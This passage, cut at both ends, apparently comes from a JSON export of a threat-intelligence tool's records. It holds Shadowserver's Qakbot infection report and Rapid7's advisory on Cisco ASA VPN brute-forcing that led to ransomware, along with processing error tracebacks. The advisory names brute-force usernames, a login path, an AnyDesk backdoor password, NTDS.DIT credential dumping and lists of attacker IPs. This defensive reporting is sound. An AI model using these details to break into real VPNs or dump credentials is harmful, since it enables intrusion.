Congo\nPalestine\nLiberia\nCroatia\nOman\nBosnia and Herzegovina\nPuerto Rico\nKuwait\nMoldov\nMauritania\nPanama\nUruguay\nArmenia\nLithuania\nAlbania\nMongolia\nJamaica\nNamibia\nLesotho\nQatar\nMacedonia\nSlovenia\nBotswana\nLatvia\nGambia\nKosovo\nGuinea-Bissau\nGabon\nEquatorial Guinea\nTrinidad and Tobago\nEstonia\nMauritius\nSwaziland\nBahrain\nTimor-Leste\nDjibouti\nCyprus\nFiji\nReunion (France)\nGuyana\nComoros\nBhutan\nMontenegro\nMacau (China)\nSolomon Islands\nWestern Sahara\nLuxembourg\nSuriname\nCape Verde\nMalta\nGuadeloupe (France)\nMartinique (France)\nBrunei\nBahamas\nIceland\nMaldives\nBelize\nBarbados\nFrench Polynesia (France)\nVanuatu\nNew Caledonia (France)\nFrench Guiana (France)\nMayotte (France)\nSamoa\nSao Tom and Principe\nSaint Lucia\nGuam (USA)\nCuracao (Netherlands)\nSaint Vincent and the Grenadines\nKiribati\nUnited States Virgin Islands (USA)\nGrenada\nTonga\nAruba (Netherlands)\nFederated States of Micronesia\nJersey (UK)\nSeychelles\nAntigua and Barbuda\nIsle of Man (UK)\nAndorra\nDominica\nBermuda (UK)\nGuernsey (UK)\nGreenland (Denmark)\nMarshall Islands\nAmerican Samoa (USA)\nCayman Islands (UK)\nSaint Kitts and Nevis\nNorthern Mariana Islands (USA)\nFaroe Islands (Denmark)\nSint Maarten (Netherlands)\nSaint Martin (France)\nLiechtenstein\nMonaco\nSan Marino\nTurks and Caicos Islands (UK)\nGibraltar (UK)\nBritish Virgin Islands (UK)\nAland Islands (Finland)\nCaribbean Netherlands (Netherlands)\nPalau\nCook Islands (NZ)\nAnguilla (UK)\nWallis and Futuna (France)\nTuvalu\nNauru\nSaint Barthelemy (France)\nSaint Pierre and Miquelon (France)\nMontserrat (UK)\nSaint Helena, Ascension and Tristan da Cunha (UK)\nSvalbard and Jan Mayen (Norway)\nFalkland Islands (UK)\nNorfolk Island (Australia)\nChristmas Island (Australia)\nNiue (NZ)\nTokelau (NZ)\nVatican City\nCocos (Keeling) Islands (Australia)\nPitcairn Islands (UK)\nThis website uses cookies in order to optimize your user experience as well as for advertising and analytics.  For further information, please read our Privacy Policy and ourCookie Notice.\nDISMISS\nManage Preferences",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-02T19:14:53.425Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651b18374870a8160e460e2b"
  },
  "name": "Qakbot",
  "file_type": null,
  "website_url": "https://www.shadowserver.org/news/qakbot-historical-bot-infections-special-report/",
  "website_title": "Qakbot Historical Bot Infections Special Report | The Shadowserver Foundation",
  "file_name": null,
  "file_size": null,
  "content": "HomeNews & InsightsQakbot Historical Bot Infections Special Report\nQakbot Historical Bot Infections Special Report\nSEPTEMBER 8, 2023\nAs covered in our previous blog post, on Tuesday 29th August 2023, the US Department of Justice (DoJ) and US Federal Bureau of Investigation (FBI), together with other global law enforcement partners, announced a disruption action against the Qakbot botnet.\nThis activity has been widely reported on, and involved the FBI deleting the Qakbot malware from infected victim computers under US court order (to reduce the risk of further harm).\nSince the Qakbot malware was deleted from the victim systems during this law enforcement action, the traditional sinkhole-based approach of detecting infected devices via observed command and control traffic, and then reporting these victim systems out to network owners and National CSIRTs for remediation, will not be possible.\nHowever, as part of their operation, the FBI acquired a copy of the threat actor’s database of historical Qakbot infections, which covered the period July 2019 to August 2023. This database contains a record of over 700,000 discrete Qakbot bot infections, covering victims systems in 230 countries.\nAt the request of the FBI, The Shadowserver Foundation are sharing elements of this dataset with system defenders in the following manner:\nNational CSIRTs will receive a one-off ‘Special Report’ about historical Qakbot infected devices in their country, containing victim IP addresses and supporting meta data to allow system identification, filtered by geographical region. Shadowserver currently has 201 nCSIRTs in 175 countries and territories receiving our data globally, and are working to help countries who do not yet have a National CSIRT to develop that capability.\nNetwork owners will receive a one-off ‘Special Report’ about historical Qakbot infected devices in their own networks of responsibility, containing victim IP addresses and supporting meta data to allow system identification. Over 8000 organizations are currently directly subscribed to Shadowserver’s free data network reports. This includes organizations responsible for more than 59% of IPv4 network space in the United States.\nThis Qakbot Historical Bot Infections Special Report will be disseminated overnight on September 7th 2023. The supporting web page for this Special Report can be found here.\nAnyone who has not yet signed up for Shadowserver’s free daily network reports can subscribe and register their network space here. If you sign up after the dissemination date, you can request a back dated Qakbot Historical Bot Infections Special Report for your network (or country, for new nCSIRTs).\nThis reporting is provided in partnership with the FBI, at no cost, as a public benefit service, and is part of Shadowserver’s mission to make the Internet more secure for all users.\nSECONDARY MALWARE INFECTIONS\nIt is important to note that Qakbot has been used to drop additional malware on infected systems, so although the FBI have deleted live Qakbot infections, other malware infections may still be active on these systems and require further local remediation efforts. These victim systems may also have been used in historic or recent intrusions and ransomware incidents.\nWe are aware of cases where Qakbot was a secondary infection to Emotet and has been seen in conjunction with other criminal activity (such as the unauthorised deployment of Cobalt Strike, likely as a precursor to ransomware attacks). We therefore ask all recipients of these Special Report notifications to not just consider Qakbot in their incident response activities, but also the possibility of secondary infections and/or indication of wider lateral movement.\nIf you have received a Qakbot Historical Bot Infections Special Report and you need more information about a specific infection, please contact us and we can provide more details, or put you in touch with the law enforcement investigating officers, if required.\nIt should be noted that some IP addresses can be associated with multiple Qakbot infections over that time period. A subset of the recorded Qakbot “victims” are likely to actually be security researchers or sandbox systems, but these events have been included for completeness (hopefully, those people know who they are, and what they have been doing).\nQAKBOT HISTORICAL BOT INFECTIONS – DATA ANALYSIS\nWe are publicly sharing some high level analysis of the Qakbot historical bot infections dataset from the period between July 2019 to August 2023. For each of the images below you can click on it to view a higher resolution version.\nThe world maps below show the total number of Qakbot infections logged per country:\n(Qakbot infections per country – linear scale) \n(Qakbot infections per country – logarithmic scale) \nThe IP-geolocated locations of each logged Qakbot infection (note that since there can be multiple bot infections behind a single IP address, these visualizations show unique geolocated IP addresses and may therefore under-represent the actual victim distribution globally):\n(IP-geolocated Qakbot infections – Worldwide)\n(IP-geolocated Qakbot infections – USA)\n(IP-geolocated Qakbot infections – North America)\n(IP-geolocated Qakbot infections – Central America)\n(IP-geolocated Qakbot infections – South America)\n(IP-geolocated Qakbot infections – Europe)\n(IP-geolocated Qakbot infections – UK/Europe)\n(IP-geolocated Qakbot infections – Scandinavia)\n(IP-geolocated Qakbot infections – Middle East)\n(IP-geolocated Qakbot infections – Africa)\n(IP-geolocated Qakbot infections – East Asia)\n(IP-geolocated Qakbot infections – Oceania)\n(IP-geolocated Qakbot infections – Australia/New Zealand)\nLooking at the data in a different way, the tree map below shows the relative ratio of Qakbot infections logged per country to the total. Note that a small number (398) of IP addresses do not geolocate to a country, so the displayed number is slightly lower than the actual total:\n(Qakbot infections per country) \nIn chart form, the total number of Qakbot infections logged during the period July 2019 to August 2023, and the percentage of the total per country, was:\n(Qakbot infections and percentage of total per country) \nIf you have any questions, please contact us, although there may be limitations on what information can be shared at this moment due to the ongoing LE investigations.\nBotnets Bots Geo Locations Malware Reports Sinkholes Statistics Takedowns Threat Intelligence\n« Back to News & Insights\nRecent Articles\nQakbot Botnet Disruption\nAUGUST 29, 2023\nOn Tuesday 29th August 2023, the US Department of Justice (DoJ) and US Federal Bureau of Investigations (FBI) - along with law… Read more »\nTechnical Summary of Observed Citrix CVE-2023-3519 Incidents\nAUGUST 7, 2023\nThe Shadowserver Foundation and trusted partners have observed three different malicious campaigns that have exploited… Read more »\nMultiple language Dashboard support\nJUNE 2, 2023\nWe are happy to announce the addition of the support for multiple languages in our public Dashboard. Five different languages… Read more »\nSearch\nHome Who We Are What We Do Who We Serve News & Insights Dashboard Common Questions Become a Partner Contact Us\n© 2023 THE SHADOWSERVER FOUNDATION PRIVACY & TERMS\nThe Shadowserver Foundation GitHub »",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-10-02T19:21:27.280Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": "5WWyZVTNVXRMC7eb0YwTlemJDYE3",
  "updated_on": {
    "$date": "2023-10-02T19:45:45.312Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "651b19224870a8160e460e2c"
  },
  "name": "Akira Ransomware",
  "file_type": null,
  "website_url": "https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns/",
  "website_title": "Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs | Rapid7 Blog",
  "file_name": null,
  "file_size": null,
  "content": "Select\nTRY MDR\nUnder Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs\nAug 29, 2023 7 min read Rapid7\nLast updated at Thu, 07 Sep 2023 14:02:21 GMT\nTyler Starks, Christiaan Beek, Robert Knapp, Zach Dayton, and Caitlin Condon contributed to this blog.\nRapid7’s managed detection and response (MDR) teams have observed increased threat activity targeting Cisco ASA SSL VPN appliances (physical and virtual) dating back to at least March 2023. In some cases, adversaries have conducted credential stuffing attacks that leveraged weak or default passwords; in others, the activity we’ve observed appears to be the result of targeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was either not enabled or was not enforced for all users (i.e., via MFA bypass groups). Several incidents our managed services teams have responded to ended in ransomware deployment by the Akira and LockBit groups.\nThere is no clear pattern among target organizations or verticals. Victim organizations varied in size and spanned healthcare, professional services, manufacturing, and oil and gas, along with other verticals. We have included indicators of compromise (IOCs) and attacker behavior observations in this blog, along with practical recommendations to help organizations strengthen their security posture against future attacks. Note: Rapid7 has not observed any bypasses or evasion of correctly configured MFA.\nRapid7 has been actively working with Cisco over the course of our investigations. On August 24, Cisco’s Product Security Incident Response Team (PSIRT) published a blog outlining attack tactics they have observed, many of which overlap with Rapid7’s observations. We thank Cisco for their collaboration and willingness to share information in service of protecting users.\nObserved attacker behavior\nRapid7 identified at least 11 customers who experienced Cisco ASA-related intrusions between March 30 and August 24, 2023. Our team traced the malicious activity back to an ASA appliance servicing SSL VPNs for remote users. ASA appliance patches varied across compromised appliances — Rapid7 did not identify any particular version that was unusually susceptible to exploitation.\nIn our analysis of these intrusions, Rapid7 identified multiple areas of overlap among observed IOCs. The Windows clientname WIN-R84DEUE96RB was often associated with threat actor infrastructure, along with the IP addresses 176.124.201[.]200 and 162.35.92[.]242. We also saw overlap in accounts used to authenticate into internal systems, including the use of accounts TEST, CISCO, SCANUSER, and PRINTER. User domain accounts were also used to successfully authenticate to internal assets — in several cases, attackers successfully authenticated on the first try, which may indicate that the victim accounts were using weak or default credentials.\nThe below image is an anonymized log entry where an attacker attempts a (failed) login to the Cisco ASA SSL VPN service. In our analysis of log files across different incident response cases, we frequently observed failed login attempts occurring within milliseconds of one another, which points at automated attacks.\nIn most of the incidents we investigated, threat actors attempted to log into ASA appliances with a common set of usernames, including:\nadmin\nadminadmin\nbackupadmin\nkali\ncisco\nguest\naccounting\ndeveloper\nftp user\ntraining\ntest\nprinter\necho\nsecurity\ninspector\ntest test\nsnmp\nThe above is a fairly standard list of accounts that may point at use of a brute forcing tool. In some cases, the usernames in login attempts belonged to actual domain users. While we have no specific evidence of leaked victim credentials, we are aware that it’s possible to attempt to brute force a Cisco ASA service with the path +CSCOE+/logon.htm. VPN group names are also visible in the source code of the VPN endpoint login page and can be easily extracted, which can aid brute forcing attacks.\nUpon successful authentication to internal assets, threat actors deployed set.bat. Execution of set.bat resulted in the installation and execution of the remote desktop application AnyDesk, with a set password of greenday#@!. In some cases, nd.exe was executed on systems to dump NTDS.DIT, as well as the SAM and SYSTEM hives, which may have given the adversary access to additional domain user credentials. The threat actors performed further lateral movement and binary executions across other systems within target environments to increase the scope of compromise. As mentioned previously, several of the intrusions culminated in the deployment and execution of Akira or LockBit-related ransomware binaries.\nDark web activity\nIn parallel with incident response investigations into ASA-based intrusions, Rapid7 threat intelligence teams have been monitoring underground forums and Telegram channels for threat actor discussion about these types of attacks. In February 2023, a well-known initial access broker called “Bassterlord” was observed in XSS forums selling a guide on breaking into corporate networks. The guide, which included chapters on SSL VPN brute forcing, was being sold for $10,000 USD.\nWhen several other forums started leaking information from the guide, Bassterlord posted on Twitter about shifting to a content rental model rather than selling the guide wholesale:\nRapid7 obtained a leaked copy of the manual and analyzed its content. Notably, the author claimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services with the username/password combination test:test. It’s possible that, given the timing of the dark web discussion and the increased threat activity we observed, the manual’s instruction contributed to the uptick in brute force attacks targeting Cisco ASA VPNs.\nIndicators of compromise\nRapid7 identified the following IP addresses associated with source authentication events to compromised internal assets, as well as outbound connections from AnyDesk:\n161.35.92.242\n173.208.205.10\n185.157.162.21\n185.193.64.226\n149.93.239.176\n158.255.215.236\n95.181.150.173\n94.232.44.118\n194.28.112.157\n5.61.43.231\n5.183.253.129\n45.80.107.220\n193.233.230.161\n149.57.12.131\n149.57.15.181\n193.233.228.183\n45.66.209.122\n95.181.148.101\n193.233.228.86\n176.124.201.200\n162.35.92.242\n144.217.86.109\nOther IP addresses that were observed conducting brute force attempts:\n31.184.236.63\n31.184.236.71\n31.184.236.79\n194.28.112.149\n62.233.50.19\n194.28.112.156\n45.227.255.51\n185.92.72.135\n80.66.66.175\n62.233.50.11\n62.233.50.13\n194.28.115.124\n62.233.50.81\n152.89.196.185\n91.240.118.9\n185.81.68.45\n152.89.196.186\n185.81.68.46\n185.81.68.74\n62.233.50.25\n62.233.50.17\n62.233.50.23\n62.233.50.101\n62.233.50.102\n62.233.50.95\n62.233.50.103\n92.255.57.202\n91.240.118.5\n91.240.118.8\n91.240.118.7\n91.240.118.4\n161.35.92.242\n45.227.252.237\n147.78.47.245\n46.161.27.123\n94.232.43.143\n94.232.43.250\n80.66.76.18\n94.232.42.109\n179.60.147.152\n185.81.68.197\n185.81.68.75\nMany of the IP addresses above were hosted by the following providers:\nChang Way Technologies Co. Limited\nFlyservers S.A.\nXhost Internet Solutions Lp\nNFOrce Entertainment B.V.\nVDSina Hosting\nLog-based indicators:\nLogin attempts with invalid username and password combinations (%ASA-6-113015)\nRAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)\nMitigation guidance\nAs Rapid7’s mid-year threat review noted, nearly 40% of all incidents our managed services teams responded to in the first half of 2023 stemmed from lack of MFA on VPN or virtual desktop infrastructure. These incidents reinforce that use of weak or default credentials remains common, and that credentials in general are often not protected as a result of lax MFA enforcement in corporate networks.\nTo mitigate the risk of the attacker behavior outlined in this blog, organizations should:\nEnsure default accounts have been disabled or passwords have been reset from the default.\nEnsure MFA is enforced across all VPN users, limiting exceptions to this policy as much as possible.\nEnable logging on VPNs: Cisco has information on doing this for ASA specifically here, along with guidance on collecting forensic evidence from ASA devices here.\nMonitor VPN logs for authentication attempts occurring outside expected locations of employees.\nMonitor VPN logs for failed authentications, looking for brute forcing and password spraying patterns.\nAs a best practice, keep current on patches for security issues in VPNs, virtual desktop infrastructure, and other gateway devices.\nRapid7 is monitoring MDR customers for anomalous authentication events and signs of brute forcing and password spraying. For InsightIDR and MDR customers, the following non-exhaustive list of detection rules are deployed and alerting on activity related to the attack patterns in this blog:\nAttacker Technique - NTDS File Access\nAttacker Tool - Impacket Lateral Movement\nProcess Spawned By SoftPerfect Network Scanner\nExecution From Root of ProgramData\nVarious sources have recently published pieces noting that ransomware groups appear to be targeting Cisco VPNs to gain access to corporate networks. Rapid7 strongly recommends reviewing the IOCs and related information in this blog and in Cisco’s PSIRT blog and taking action to strengthen security posture for VPN implementations.\nUpdates\nOn September 6, Cisco published an advisory on CVE-2023-20269, an unauthorized access vulnerability affecting ASA and Firepower Threat Defense remote access VPNs. According to the advisory, CVE-2023-20269 arises from improper separation of authentication, authorization, and accounting (AAA) between the remote access VPN feature and the HTTPS management and site-to-site VPN features. Successful exploitation could allow an unauthenticated, remote attacker to conduct a brute force attack in an attempt to identify valid username and password combinations or an authenticated, remote attacker to establish a clientless SSL VPN session with an unauthorized user.\nCVE-2023-20269 is being exploited in the wild and is related to some of the behavior Rapid7 has observed and outlined in this blog. A software update for Cisco ASA and FTD is pending. In the meantime, Cisco has workarounds and additional information in their advisory.\nDownload Rapid7's 2023 Mid-Year Threat Report ▶︎\nPOST TAGS\nEmergent Threat Response Managed Detection and Response (MDR) Detection and Response\nSHARING IS CARING\nAUTHOR\nRapid7\nVIEW RAPID7'S POSTS\nTopics\nMetasploit  (742)\nVulnerability Management  (420)\nDetection and Response  (320)\nResearch  (282)\nApplication Security  (153)\nCloud Security  (132)\nPopular Tags\nMetasploit Logentries IT Ops Vulnerability Management Detection and Response Metasploit Weekly Wrapup Research Automation and Orchestration Nexpose InsightIDR Komand Incident Detection Penetration Testing Vulnerability Disclosure Exploits\nRelated Posts\nProactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR\nREAD MORE\nCritical Vulnerabilities in WS_FTP Server\nREAD MORE\nUnlock Broader Detections and Forensics with Velociraptor in Rapid7 XDR\nREAD MORE\nCVE-2023-42793: Critical Authentication Bypass in JetBrains TeamCity CI/CD Servers\nREAD MORE\nRelated Posts\nMANAGED DETECTION AND RESPONSE (MDR)\nProactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR\nREAD FULL POST\nEMERGENT THREAT RESPONSE\nCritical Vulnerabilities in WS_FTP Server\nREAD FULL POST\nDFIR\nUnlock Broader Detections and Forensics with Velociraptor in Rapid7 XDR\nREAD FULL POST\nEMERGENT THREAT RESPONSE\nCVE-2023-42793: Critical Authentication Bypass in JetBrains TeamCity CI/CD Servers\nREAD FULL POST\nVIEW ALL POSTS\nSearch\nBACK TO TOP\nCUSTOMER SUPPORT\n+1-866-390-8113 (Toll Free)\nSALES SUPPORT\n+1-866-772-7437 (Toll Free)\nNeed to report an Escalation or a Breach?\nGET HELP\nSOLUTIONS\nXDR & SIEM Platform\nManaged Threat Complete\nCloud Risk Complete\nSUPPORT & RESOURCES\nProduct Support\nResource Library\nOur Customers\nEvents & Webcasts\nTraining & Certification\nCybersecurity Fundamentals\nVulnerability & Exploit Database\nABOUT US\nCompany\nDiversity, Equity, and Inclusion\nLeadership\nNews & Press Releases\nPublic Policy\nOpen Source\nInvestors\nCONNECT WITH US\nContact\nBlog\nSupport Login\nCareers\n© Rapid7 Legal Terms   |   Privacy Policy   |   Export Notice   |   Trust\nContact Us\n\nRapid7 uses cookies and similar technologies as strictly necessary to make our site work. We and our partners would also like to set additional cookies to analyze your use of our site, to personalize and enhance your visit to our site and to show you more relevant content and advertising.Privacy Statement\nAccept Cookies\nDo Not Sell My Personal Information",
  "status": "FAILED TO ANALYZE",
  "report_type": "WEBSITE",
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 106, in __convert_openAI_analysis\n    ThreatReportCCFESerializer().load(analysis)\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 722, in load\n    return self._do_load(\n           ^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 909, in _do_load\n    raise exc\nmarshmallow.exceptions.ValidationError: {'threat_actor': ['Shorter than minimum length 1.']}\n",
  "added_on": {
    "$date": "2023-10-02T19:25:22.607Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651b1ada4870a8160e460e2f"
  },
  "name": "Akira Ransomware (PDF)",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "web_to_pdf.pdf",
  "file_size": "111 KB",
  "content": "ast updated at Thu, 07 Sep 2023 14:02:21 GMT\n\nTyler Starks, Christiaan Beek, Robert Knapp, Zach Dayton, and Caitlin Condon contributed to this\n\nblog.\n\nRapid7s managed detection and response (MDR) teams have observed increased threat activity\n\ntargeting Cisco ASA SSL VPN appliances (physical and virtual) dating back to at least March\n\n2023. In some cases, adversaries have conducted credential stung attacks that leveraged\n\nweak or default passwords; in others, the activity weve observed appears to be the result of\n\ntargeted brute-force attacks on ASA appliances where multi-factor authentication (MFA) was\n\neither not enabled or was not enforced for all users (i.e., via MFA bypass groups). Several\n\nincidents our managed services teams have responded to ended in ransomware deployment by\n\nthe Akira and LockBit groups.\n\nThere is no clear pattern among target organizations or verticals. Victim organizations varied in\n\nsize and spanned healthcare, professional services, manufacturing, and oil and gas, along with\n\nother verticals. We have included indicators of compromise (IOCs) and attacker behavior\n\nobservations in this blog, along with practical recommendations to help organizations\n\nstrengthen their security posture against future attacks. Note: Rapid7 has not observed any\n\nbypasses or evasion of correctly congured MFA.\n\nRapid7 has been actively working with Cisco over the course of our investigations. On August\n\n24, Ciscos Product Security Incident Response Team (PSIRT) published a blog outlining attack\n\n\ftactics they have observed, many of which overlap with Rapid7s observations. We thank Cisco\n\nfor their collaboration and willingness to share information in service of protecting users.\n\nObserved attacker behavior\n\nRapid7 identied at least 11 customers who experienced Cisco ASA-related intrusions between\n\nMarch 30 and August 24, 2023. Our team traced the malicious activity back to an ASA appliance\n\nservicing SSL VPNs for remote users. ASA appliance patches varied across compromised\n\nappliances  Rapid7 did not identify any particular version that was unusually susceptible to\n\nexploitation.\n\nIn our analysis of these intrusions, Rapid7 identied multiple areas of overlap among observed\n\nIOCs. The Windows clientname WIN-R84DEUE96RB was often associated with threat actor\n\ninfrastructure, along with the IP addresses 176.124.201[.]200 and 162.35.92[.]242.\n\nWe also saw overlap in accounts used to authenticate into internal systems, including the use of\n\naccounts TEST, CISCO, SCANUSER, and PRINTER. User domain accounts were also used to\n\nsuccessfully authenticate to internal assets  in several cases, attackers successfully\n\nauthenticated on the rst try, which may indicate that the victim accounts were using weak or\n\ndefault credentials.\n\nThe below image is an anonymized log entry where an attacker attempts a (failed) login to the\n\nCisco ASA SSL VPN service. In our analysis of log les across different incident response cases,\n\n\fwe frequently observed failed login attempts occurring within milliseconds of one another,\n\nwhich points at automated attacks.\n\nIn most of the incidents we investigated, threat actors attempted to log into ASA appliances\n\nwith a common set of usernames, including:\n\n admin\n\n adminadmin\n\n backupadmin\n\n kali\n\n cisco\n\n guest\n\n accounting\n\n developer\n\n ftp user\n\n training\n\n test\n\n printer\n\n echo\n\n security\n\n inspector\n\n\f test test\n\n snmp\n\nThe above is a fairly standard list of accounts that may point at use of a brute forcing tool. In\n\nsome cases, the usernames in login attempts belonged to actual domain users. While we have\n\nno specic evidence of leaked victim credentials, we are aware that its possible to attempt to\n\nbrute force a Cisco ASA service with the path +CSCOE+/logon.htm. VPN group names are\n\nalso visible in the source code of the VPN endpoint login page and can be easily extracted,\n\nwhich can aid brute forcing attacks.\n\nUpon successful authentication to internal assets, threat actors deployed set.bat. Execution\n\nof set.bat resulted in the installation and execution of the remote desktop application\n\nAnyDesk, with a set password of greenday#@!. In some cases, nd.exe was executed on\n\nsystems to dump NTDS.DIT, as well as the SAM and SYSTEM hives, which may have given the\n\nadversary access to additional domain user credentials. The threat actors performed further\n\nlateral movement and binary executions across other systems within target environments to\n\nincrease the scope of compromise. As mentioned previously, several of the intrusions\n\nculminated in the deployment and execution of Akira or LockBit-related ransomware binaries.\n\nDark web activity\n\nIn parallel with incident response investigations into ASA-based intrusions, Rapid7 threat\n\nintelligence teams have been monitoring underground forums and Telegram channels for threat\n\n\factor discussion about these types of attacks. In February 2023, a well-known initial access\n\nbroker called Bassterlord was observed in XSS forums selling a guide on breaking into\n\ncorporate networks. The guide, which included chapters on SSL VPN brute forcing, was being\n\nsold for $10,000 USD.\n\nWhen several other forums started leaking information from the guide, Bassterlord posted on\n\nTwitter about shifting to a content rental model rather than selling the guide wholesale:\n\nRapid7 obtained a leaked copy of the manual and analyzed its content. Notably, the author\n\nclaimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services\n\nwith the username/password combination test:test. Its possible that, given the timing of\n\nthe dark web discussion and the increased threat activity we observed, the manuals instruction\n\ncontributed to the uptick in brute force attacks targeting Cisco ASA VPNs.\n\nIndicators of compromise\n\nRapid7 identied the following IP addresses associated with source authentication events to\n\ncompromised internal assets, as well as outbound connections from AnyDesk:\n\n 161.35.92.242\n\n 173.208.205.10\n\n 185.157.162.21\n\n\f 185.193.64.226\n\n 149.93.239.176\n\n 158.255.215.236\n\n 95.181.150.173\n\n 94.232.44.118\n\n 194.28.112.157\n\n 5.61.43.231\n\n 5.183.253.129\n\n 45.80.107.220\n\n 193.233.230.161\n\n 149.57.12.131\n\n 149.57.15.181\n\n 193.233.228.183\n\n 45.66.209.122\n\n 95.181.148.101\n\n 193.233.228.86\n\n 176.124.201.200\n\n 162.35.92.242\n\n 144.217.86.109\n\n\fOther IP addresses that were observed conducting brute force attempts:\n\n 31.184.236.63\n\n 31.184.236.71\n\n 31.184.236.79\n\n 194.28.112.149\n\n 62.233.50.19\n\n 194.28.112.156\n\n 45.227.255.51\n\n 185.92.72.135\n\n 80.66.66.175\n\n 62.233.50.11\n\n 62.233.50.13\n\n 194.28.115.124\n\n 62.233.50.81\n\n 152.89.196.185\n\n 91.240.118.9\n\n 185.81.68.45\n\n 152.89.196.186\n\n 185.81.68.46\n\n 185.81.68.74\n\n\f 62.233.50.25\n\n 62.233.50.17\n\n 62.233.50.23\n\n 62.233.50.101\n\n 62.233.50.102\n\n 62.233.50.95\n\n 62.233.50.103\n\n 92.255.57.202\n\n 91.240.118.5\n\n 91.240.118.8\n\n 91.240.118.7\n\n 91.240.118.4\n\n 161.35.92.242\n\n 45.227.252.237\n\n 147.78.47.245\n\n 46.161.27.123\n\n 94.232.43.143\n\n 94.232.43.250\n\n 80.66.76.18\n\n 94.232.42.109\n\n\f 179.60.147.152\n\n 185.81.68.197\n\n 185.81.68.75\n\nMany of the IP addresses above were hosted by the following providers:\n\n Chang Way Technologies Co. Limited\n\n Flyservers S.A.\n\n Xhost Internet Solutions Lp\n\n NFOrce Entertainment B.V.\n\n VDSina Hosting\n\nLog-based indicators:\n\n Login attempts with invalid username and password combinations\n\n(%ASA-6-113015)\n\n RAVPN session creation (attempts) for unexpected proles/TGs\n\n(%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)\n\nMitigation guidance\n\nAs Rapid7s mid-year threat review noted, nearly 40% of all incidents our managed services\n\nteams responded to in the rst half of 2023 stemmed from lack of MFA on VPN or virtual\n\ndesktop infrastructure. These incidents reinforce that use of weak or default credentials\n\n\fremains common, and that credentials in general are often not protected as a result of lax MFA\n\nenforcement in corporate networks.\n\nTo mitigate the risk of the attacker behavior outlined in this blog, organizations should:\n\n Ensure default accounts have been disabled or passwords have been reset from\n\nthe default.\n\n Ensure MFA is enforced across all VPN users, limiting exceptions to this policy as\n\nmuch as possible.\n\n Enable logging on VPNs: Cisco has information on doing this for ASA specically\n\nhere, along with guidance on collecting forensic evidence from ASA devices here.\n\n Monitor VPN logs for authentication attempts occurring outside expected\n\nlocations of employees.\n\n Monitor VPN logs for failed authentications, looking for brute forcing and\n\npassword spraying patterns.\n\n As a best practice, keep current on patches for security issues in VPNs, virtual\n\ndesktop infrastructure, and other gateway devices.\n\nRapid7 is monitoring MDR customers for anomalous authentication events and signs of brute\n\nforcing and password spraying. For InsightIDR and MDR customers, the following\n\nnon-exhaustive list of detection rules are deployed and alerting on activity related to the attack\n\npatterns in this blog:\n\n\f Attacker Technique - NTDS File Access\n\n Attacker Tool - Impacket Lateral Movement\n\n Process Spawned By SoftPerfect Network Scanner\n\n Execution From Root of ProgramData\n\nVarious sources have recently published pieces noting that ransomware groups appear to be\n\ntargeting Cisco VPNs to gain access to corporate networks. Rapid7 strongly recommends\n\nreviewing the IOCs and related information in this blog and in Ciscos PSIRT blog and taking\n\naction to strengthen security posture for VPN implementations.\n\nUpdates\n\nOn September 6, Cisco published an advisory on CVE-2023-20269, an unauthorized access\n\nvulnerability affecting ASA and Firepower Threat Defense remote access VPNs. According to\n\nthe advisory, CVE-2023-20269 arises from improper separation of authentication, authorization,\n\nand accounting (AAA) between the remote access VPN feature and the HTTPS management\n\nand site-to-site VPN features. Successful exploitation could allow an unauthenticated, remote\n\nattacker to conduct a brute force attack in an attempt to identify valid username and password\n\ncombinations or an authenticated, remote attacker to establish a clientless SSL VPN session\n\nwith an unauthorized user.\n\n\fCVE-2023-20269 is being exploited in the wild and is related to some of the behavior Rapid7 has\n\nobserved and outlined in this blog. A software update for Cisco ASA and FTD is pending. In the\n\nmeantime, Cisco has workarounds and additional information in their advisory.\n\n\f",
  "status": "FAILED TO ANALYZE",
  "report_type": "FILE",
  "message": "Traceback (most recent call last):\n  File \"/workspace/services/threat_analysis/threat_analysis_orchestrator.py\", line 106, in __convert_openAI_analysis\n    ThreatReportCCFESerializer().load(analysis)\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 722, in load\n    return self._do_load(\n           ^^^^^^^^^^^^^^\n  File \"/layers/google.python.pip/pip/lib/python3.11/site-packages/marshmallow/schema.py\", line 909, in _do_load\n    raise exc\nmarshmallow.exceptions.ValidationError: {'threat_actor': ['Shorter than minimum length 1.']}\n",
  "added_on": {
    "$date": "2023-10-02T19:32:42.356Z"
  },
  "added_by": "RzJzJwgfCxeudrKPanKVvkDOi123",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651b1bdf4870a8160e460e30"
  },
  "name": "BitRAT",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "BitRAT.pdf",
  "file_size": "54 KB",
